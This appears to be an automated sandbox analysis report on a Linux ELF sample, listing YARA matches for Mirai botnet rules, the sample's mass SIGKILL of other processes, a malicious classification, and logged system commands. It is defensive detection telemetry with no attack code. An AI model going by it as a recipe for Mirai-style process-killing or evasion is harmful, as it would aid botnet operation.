Source: 5274.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 5272.1.00000000354abf44.00000000657812a2.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5268.1.00000000354abf44.00000000657812a2.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5274.1.00000000354abf44.00000000657812a2.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5266.1.00000000354abf44.00000000657812a2.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5263.1.00000000354abf44.00000000657812a2.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5275.1.00000000271eff95.00000000354abf44.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5272.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5272.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5272.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 5263.1.00000000271eff95.00000000354abf44.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5271.1.00000000271eff95.00000000354abf44.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5275.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5275.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5275.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 5271.1.00000000354abf44.00000000657812a2.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5266.1.00000000271eff95.00000000354abf44.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5275.1.00000000354abf44.00000000657812a2.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5263.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5263.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5263.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 5266.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5266.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5266.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Sample tries to kill a process (SIGKILL)
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5271, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 491, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 658, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 720, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 721, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 759, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 761, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 772, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 774, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 777, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 785, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 793, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 1334, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 1335, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 1344, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 1872, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 1886, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 2048, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5039, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5177, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5178, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5268, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5274, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5275, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5305, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5360, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5372, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5448, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5449, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5568, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5569, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5575, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5635, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5655, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5658, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5672, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5679, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5681, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5683, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5688, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5747, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5760, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5766, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5768, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5775, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5789, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5795, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5798, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5857, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5873, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5881, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5889, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5898, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) SIGKILL sent: pid: 936, result: successful Jump to behavior
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal100.spre.troj.lin@0/200@12/0

Persistence and Installation Behavior:

barindex
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /usr/bin/dbus-daemon (PID: 5360) File: /proc/5360/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5531) File: /proc/5531/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5536) File: /proc/5536/mounts Jump to behavior
Source: /bin/fusermount (PID: 5545) File: /proc/5545/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5569) File: /proc/5569/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5679) File: /proc/5679/mounts
Source: /usr/bin/dbus-daemon (PID: 5683) File: /proc/5683/mounts
Source: /usr/bin/dbus-daemon (PID: 5775) File: /proc/5775/mounts
Source: /usr/bin/dbus-daemon (PID: 5795) File: /proc/5795/mounts
Source: /usr/bin/dbus-daemon (PID: 5898) File: /proc/5898/mounts
Source: /usr/bin/dbus-daemon (PID: 5971) File: /proc/5971/mounts
Executes the "kill" or "pkill" command typically used to terminate processes
Source: /usr/share/gdm/generate-config (PID: 5494) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service Jump to behavior
Source: /usr/share/gdm/generate-config (PID: 5675) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service Jump to behavior
Source: /usr/share/gdm/generate-config (PID: 5900) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 5458) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5460) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5462) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5464) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5466) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5468) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5473) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5476) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5522) Grep executable: /usr/bin/grep -> grep -F .utf8 Jump to behavior
Source: /bin/sh (PID: 5638) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5642) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5647) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5652) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5654) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5660) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5665) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5668) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5786) Grep executable: /usr/bin/grep -> grep -F .utf8
Source: /bin/sh (PID: 5872) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5875) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5880) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5883) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
